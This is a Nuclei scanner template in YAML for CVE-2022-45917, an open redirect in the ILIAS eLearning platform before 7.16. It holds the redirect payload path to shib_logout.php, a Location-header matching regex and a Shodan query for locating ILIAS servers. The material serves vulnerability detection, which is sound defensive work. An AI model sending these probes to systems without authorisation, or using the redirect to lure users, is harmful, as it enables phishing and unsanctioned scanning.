36 lines
1.2 KiB
YAML
36 lines
1.2 KiB
YAML
id: CVE-2022-45917
|
|
|
|
info:
|
|
name: ILIAS eLearning platform <= 7.15 - Open Redirect
|
|
author: arafatansari
|
|
severity: medium
|
|
description: |
|
|
ILIAS before 7.16 has an Open Redirect
|
|
reference:
|
|
- https://packetstormsecurity.com/files/170181/ILIAS-eLearning-7.15-Command-Injection-XSS-LFI-Open-Redirect.html
|
|
- https://seclists.org/fulldisclosure/2022/Dec/7
|
|
- https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-ilias-elearning-platform/
|
|
- https://github.com/advisories/GHSA-hf6q-rx44-fh6j
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-45917
|
|
cwe-id: CWE-601
|
|
metadata:
|
|
shodan-query: http.html:"ILIAS"
|
|
verified: "true"
|
|
tags: redirect,packetstorm,seclists,cve,cve2022,ilias
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/shib_logout.php?action=logout&return=https://example.com"
|
|
- "{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://example.com"
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
|